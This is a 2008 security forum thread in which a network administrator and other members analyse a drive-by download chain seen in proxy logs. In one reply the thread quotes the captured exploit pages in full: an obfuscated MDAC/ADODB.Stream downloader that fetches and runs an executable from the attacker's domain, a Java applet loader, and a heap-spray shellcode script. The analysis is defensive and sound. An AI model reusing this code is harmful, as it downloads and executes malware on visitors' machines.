Author Topic: Does anybody know this ?  (Read 6950 times)

0 Members and 1 Guest are viewing this topic.

September 23, 2008, 03:01:20 pm
Read 6950 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Today found in our proxy logs.

Does anybody know edit.google.com.main.update.the-format.cn ?
It downloads some java classes and an obfuscated javascript "com.php".
I have problems to decode that script. Can anybody help ?

Code: [Select]
23/Sep/2008:16:32:24 +0200   1357 xxx.xxx.xxx.xxx TCP_MISS/302 461 GET http://64.233.169.104.d78e324f848df9fc.managerss.cn/index.cn/ - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:25 +0200   1427 xxx.xxx.xxx.xxx TCP_MISS/200 1519 GET http://edit.google.com.main.update.the-format.cn/lis/index.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:28 +0200    604 xxx.xxx.xxx.xxx TCP_MISS/200 590 GET http://edit.google.com.main.update.the-format.cn/lis/javac.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:37 +0200   2001 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:38 +0200   2252 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200   1698 xxx.xxx.xxx.xxx TCP_MISS/200 4461 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200    717 xxx.xxx.xxx.xxx TCP_MISS/404 572 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:40 +0200    558 xxx.xxx.xxx.xxx TCP_MISS/404 578 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:21 +0200    847 xxx.xxx.xxx.xxx TCP_MISS/200 4462 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:24 +0200    655 xxx.xxx.xxx.xxx TCP_MISS/404 571 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:25 +0200    694 xxx.xxx.xxx.xxx TCP_MISS/404 577 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html

Java classes were detected as

Code: [Select]
Virus/Malware: JAVA_BYTEVER.BQ
File: C:\WINNT\TEMP\jar_cache22490.tmp (Baaaaa.class)
Date/Time: 23.09.2008 16:32:40
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BR
File: C:\WINNT\TEMP\jar_cache22490.tmp (BaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: TROJ_JAVA.AT
File: C:\WINNT\TEMP\jar_cache22490.tmp (Dvnny.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BS
File: C:\WINNT\TEMP\jar_cache22490.tmp (VaaaaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
Ruining the bad guy's day

September 23, 2008, 04:06:03 pm
Reply #1

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
hi,

decoding the shellcode in com.php reveals the following url:
Code: [Select]
http://dev.aero4.cn/adpack/load.php

regards,
ph

September 23, 2008, 05:24:54 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Thanks, philipp.

I can decode the shellcode if I only decode the first line manually,
but Malzilla can't decode the complete script automatically.

Result from the shellcode url:
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /adpack/load.php was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3 Server at dev.aero4.cn Port 80</ADDRESS>
</BODY></HTML>
Ruining the bad guy's day

September 23, 2008, 06:50:26 pm
Reply #3

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Is there a missing part of this script?
Or is there some createControlRange() exploit?

Evaluate just the last line of the script, the one beginning with eval().
You will get just one line as a result.
What is with that z variable? Where is that one used? That's why I'm asking about if we are missing a part of the script.
Other possibility is that it gets executed by createControlRange() function, but I do not know if such exploit exists.

September 23, 2008, 06:59:25 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Script is complete. It is enclosed in <script> tags.
A second gave the same result.
Ruining the bad guy's day

September 23, 2008, 07:14:22 pm
Reply #5

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ok, let's play that game.

hxxp://edit.google.com.main.update.the-format.cn/lis/index.php

Code: [Select]
<html><head><meta HTTP-EQUIV='REFRESH' content='2; URL=javac.php'><script> start();
function z_sa(o,p,v){ o.setAttribute(p,v); }
function start(){
var z = document.createElement('object'); z_sa(z,'id','z');z_sa(z,'classid',"cZl#sqiZdL:qBqDM9Z6ZCZ5#5Z6Z-L6L5ZAM3L-q1Z1LDq0M-M9Z8M3ZAZ-Z0M0ZCq0M4qFZCZ2Z9MEq3#6L".replace(/[MLZq#]/g, ''));
try {
var q = z.CreateObject("mZs%xJmZl%2Z.%XJMKLdHJT%TKP%".replace(/[%ZJKd]/g, ''), ''),s = z.CreateObject("S1hdeWlDlW.DAWp1pWlWiWcKaKt1ido1nW".replace(/[1dWKD]/g, ''), ''),t = z.CreateObject("awdwowdCbP.PswtSrCePaCmS".replace(/[wSCPH]/g, ''), '');
try {
t.type = 1;
q.open("GqEqT6".replace(/[96VqX]/g, ''),'http://edit.google.com.main.update.the-format.cn/lis/load.php',false);
eval("qE.xsXecncdc(E)X;Etx.EoXpcelnl(E)X;XtE.XWErXixtxec(lql.ErxeEsxpxolnEsxeEBEoEdxyE)l".replace(/[xXclE]/g, ''));
var name = ".0/z/P.O.z/t/tatdOmOiznP.0etxOet".replace(/[z0OPt]/g, '');
eval("tb.KSBabvBeETboKFBiElKeb(8nBaKm8eE,K2B)b;Etb.8CBl8oBsKeE(E)B;B".replace(/[Bb8KE]/g, ''));} catch(e) {}try { eval("sb.osoh#e#lEl#ebxqe#cbuEtEeE(#nqaEmoeb)o".replace(/[bqoE#]/g, ''));  } catch(e) {}} catch(e){}}</script></head></html>


hxxp://edit.google.com.main.update.the-format.cn/lis/javac.php
Code: [Select]
<applet archive="java.php" code="BaaaaBaa.class" width=1  height=1><param name="url" value="http://edit.google.com.main.update.the-format.cn/lis/load.php"></applet><meta HTTP-EQUIV="REFRESH" content="2;
URL=com.php">

hxxp://edit.google.com.main.update.the-format.cn/lis/load.php
downloads xloader.exe
http://www.virustotal.com/analisis/7546a66e99e92c355d0aab9c12ff9bc7

hxxp://edit.google.com.main.update.the-format.cn/lis/com.php

Code: [Select]
<script>
x=unescape("%ZuT9T0s9s0s%xux9x0Z9Z0x%ZuT1p8s6pAZ%pup6s4p5sBZ%pux0Z3x8TBx%pup4p0T8xBp%xus8pBZ3T0Z%sux1Z8Z4x0T%Zux5s8Z0T5T%Tux0p0Z0p1T%xus3s3p0x0x%Zux8p9ZDT2s%Tus8s9s1p0T%Zup0p4x5Z0s%Tux5p0Z8s9T%TuZ8p9Z0p8T%xuT0sCZ5x0x%puxCp0T8Z3x%ZuT8p9Z2Z8x%ZuT8p9Z0s0T%pux0Z4s4s0Z%ZusCZ0s8x3T%xuT6p6s0T8s%sux7s8Z3xDT%Zus7xCZ0p5T%TuZ8sBTFx2s%xup8Z1TDs8Z%sup9x0sCT3x%sux0s0p0p0Z%puZ8Z9p0T0p%TuZ3T3T1Z8s%TuT8x3sDs2p%TuZ0x4ZCZ0x%TuT1s0T8s9p%xuTCs0p8s3T%Zus8x1s0T4x%puT8p0xCs3p%pus0s0p0s0x%xux8Z9Z0Z0s%Zux3s3p1x8T%pup8p9ZCp0p%Tus8p3p0T3p%Zus0T4ZCZ3s%puZ8p1Z6s6T%TuT8s8xFxBs%suZ7xCs1sET%pux8pBZFs4T%xup8Z1TDs3x%TuZ7s0sExBp%Tup0p0p1xEs%pus6x6x0Z0s%sus3p3x8sBT%Zup8x9p6x6T%TuT4s2p3x2s%TuxCs6Z4s2p%pux0x8Z0T2x%Tus6Z6x4s2s%TuZ3s2s8sBx%suZ3s1Z6T6s%Tup4T2x3x2T%xuZCT6x4Z2p%ZuZ1x4s0Z2Z%sux6s6Z4T2p%xux3Z2p8ZBZ%suT3x1s6Z6s%Zup4s2x3x2T%pus6s6x4x2Z%suxCx3s8Z1p%Zux0s1x6p0x%pux1T3T8Z9s%pux5x3Z8x9x%puZ8T9Z0Z4x%sup8s9Z1pAT%TuT0Z4T5pAp%Zus9T0Z9x0x%pup9x0T9s0Z%Zux9p0p9x0p%sus0sfZeZbs%Zup3s3T5pbx%TuT6T6xcs9p%pus8T0xbs9x%puZ8s0Z0s1T%Zupepfx3p3Z%Zusex2p4Z3p%suxepbpfpaZ%ZuTeZ8s0p5Z%Tuxfsfxexcx%supfTfpfTfZ%xus8Tbs7Zfp%puZdTfx4pes%ZuxeTfseZfp%ZuZ6x4Tepfp%Zuxep3saTfx%suT9pfx6Z4Z%suT4x2Zfx3Z%sup9TfT6T4T%puZ6Tepep7p%suTexfp0T3x%ZuZeTfsexbx%TuZ6Z4ZeZfp%suZbT9x0T3Z%puZ6Z1x8T7T%Tupep1Zas1p%TuT0s7x0T3Z%ZuZeZfp1Z1s%puxeTfTesfT%ZuTaxaZ6s6Z%puTbZ9xeZbp%TuT7p7x8T7s%xup6s5x1x1s%puT0T7xeT1s%xuxeTfs1ZfT%suxeZfpeTfp%xuxaTax6s6x%puxbZ9Zex7T%pupcpas8T7x%pus1p0s5xfZ%puZ0p7s2ZdZ%TuZexfT0pdZ%suZeZfpeZfs%suxaZap6p6T%puTbT9xes3T%Zus0T0s8p7p%xux0pfx2s1x%puZ0x7s8ZfZ%Tuxepfx3Tbp%Zusepfsexfs%xuTasaZ6T6s%suTbs9pfTfZ%Tux2xeT8x7x%Zup0pax9p6s%puT0T7s5p7p%ZuxeTfp2x9Z%TusepfTesfx%xuZaTaZ6Z6x%Tusasfxfxbx%suTds7x6sfx%Tux9paZ2pcs%xux6s6s1p5x%xuZfx7Zaxas%puZep8T0s6p%suseZfZeTep%pupbx1ZeTfZ%xup9xap6Z6s%xup6s4ZcxbT%Tupesbpasap%puxexeZ8p5T%xus6x4ZbZ6T%suxfp7ZbTaT%xup0Z7pbT9p%ZusexfZ6T4Z%puseZfTepfx%pus8Z7xbpfT%pusfp5ZdT9T%pux9xfxcT0Z%pux7x8s0Z7x%TusesfseTfs%ZuT6s6peZfZ%puTfZ3sapap%xup2sax6x4p%sux2sfs6pcT%sup6x6TbsfT%puxcpfpapax%Tus1T0p8Z7s%ZuTesfsexfT%ZusbpfpeTfT%Tupapap6p4s%sux8s5pfTbp%xusbZ6pepds%xusbsaZ6T4Z%xuZ0s7sfp7x%puZepfx8seZ%puTexfxeZfT%ZuTapaZexcZ%TuZ2s8Tcsfx%pupbs3TeTfZ%Tuxcp1s9s1p%suZ2x8Z8pap%ZuZepbxasfx%pup8Tap9x7p%ZuTeZfseTfp%sus9xap1s0s%Zux6s4xcpfx%pupep3sasaT%Zupepep8T5p%puT6x4xbp6Z%xupfZ7ZbZas%Zuxasfx0T7p%xuxepfZepfs%xus8p5pexfs%puxbs7xeZ8Z%TuTaZaxeZcs%TupdTcpcxbZ%Tupbscp3Z4x%TuT1Z0xbxcx%ZuTcxfp9xap%puxbZcsbpfZ%susaxap6Z4p%xup8s5xfT3Z%TuTbp6ZepaZ%pupbxaZ6x4x%pux0p7xfT7Z%xuxesfscpcT%TuZepfseTfZ%xupesfs8Z5s%xuT9Zap1p0Z%Zup6s4ZcsfZ%ZuZes7xasap%puTeTdp8T5p%xux6s4pbx6Z%puZfZ7ZbTaZ%TuZfpfx0x7p%TuTepfxesfZ%puZ8Z5ZeTfx%TuT6x4T1T0T%susfpfxaTax%TuZeses8s5x%xup6T4Tbx6Z%suZfs7pbxaT%ZupeZfx0x7p%suZeZfTeTfZ%supaTepeTfx%Tusbpdxbp4Z%xuT0TeZepcp%TuZ0ZeseTcs%Tup0sepepcp%Zux0ZeZescx%Zup0T3s6Zcx%puZbx5ZexbT%TuZ6Z4sbxcT%ZuT0pdT3p5Z%xuZbZdZ1s8Z%xuT0Tfx1T0T%Zux6T4ZbpaT%Zus6Z4T0x3T%pupex7T9Z2p%ZuxbZ2p6Z4Z%TupbZ9Tex3p%sup9xcT6s4Z%xux6T4xdT3T%supfp1p9ZbT%supeZcs9T7x%pusbx9Z1Zcs%suZ9Z9Z6p4Z%pupescxcpfZ%TuTdpcT1TcZ%xupaZ6s2Z6x%TuT4p2paseT%xuT2scZescs%xupdscTbZ9T%TuseT0x1x9T%TuZfTfs5x1x%pus1Tdsdp5s%suZes7x9pbp%sus2Z1p2ZeT%susepcTeT2p%Tusasfx1sdp%sup1TeZ0T4Z%sup1Z1Tdp4p%xuZ9ZaTbx1p%supbT5T0xaZ%TuT0p4Z6T4Z%pupbZ5s6p4s%xuZepcpcZbp%Tup8Z9s3p2T%puZeT3x6s4T%pup6x4xap4T%ZuZfx3pbp5Z%xux3Z2xeZcx%susepbT6p4s%xuxepcZ6p4s%Tusbs1p2pax%Tus2ZdTbp2p%supepfTes7Z%ZuZ1sbZ0p7Z%Zus1p0Z1x1s%ZuTbxaZ1p0p%xuZas3pbTds%Zusas0ZaT2s%ZupesfsaZ1T%sup7p4T6p8T%pux7Z0x7x4T%xuZ2pfZ3sap%xux6p4Z2xfT%xup7p6s6s5Z%Tus6T1p2pep%Tup7T2Z6p5T%Tus3T4x6Zfs%sus6Z3T2sex%xuZ2pfp6xex%pus6p4s6p1T%pup6x1s7Z0x%xup6pbx6T3Z%Tux6xcx2ZfZ%Zus6x1Z6TfZ%pux2Tes6x4T%puZ6T8p7Z0T%xup0s0s7x0T%suT0Z0x0Z0p".replace(/[pZsTx]/g, ''));
tu=unescape("%IuI0GdI0IdU%8uW08dG0IdG".replace(/[8WGIU]/g, ''));
var memz=parseInt("0OxWd@0Ad@0vdA0Wdv".replace(/[vAOW@]/g, ''));
while(tu.length<0x40000) tu+=tu;  tu=tu.substring(0,parseInt("0vxv3vfvfaev48".replace(/[8mlav]/g, ''))-x.length); o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz);
eval("zS=8d#oSc3u8mqe3nqt#.3s8c#r#iSp8tSs#[#03]S.3c#rqeSa#t#eqC8oSn3tqrSoSlSR#a#n8g#eq(q)q.3l#e8nqgStqh8".replace(/[q#8S3]/g, ''));
</script>

Did I miss something ?
Ruining the bad guy's day

September 23, 2008, 07:25:33 pm
Reply #6

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I do not see anything more than you did see.
It looks strange that a 3-years old exploit is used:
http://www.google.com/search?hl=en&q=createControlRange+exploit&btnG=Google+Search&aq=f&oq=

September 23, 2008, 07:50:37 pm
Reply #7

sowhat-x

  • Guest
Yeah,I've also seen these ".class" files couple of times in the past,
as philipp already said,I think they're part of a ready-made exploit kit...

September 23, 2008, 08:01:11 pm
Reply #8

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Yeah,I've also seen these ".class" files couple of times in the past,
as philipp already said,I think they're part of a ready-made exploit kit...

I've seen a lot of machines in the last days where the virus scanner detects suspicious java classes.
I receive detection notifications from all machines in our company network. The amount of JAVA_BYTEVER
has grown.

Ruining the bad guy's day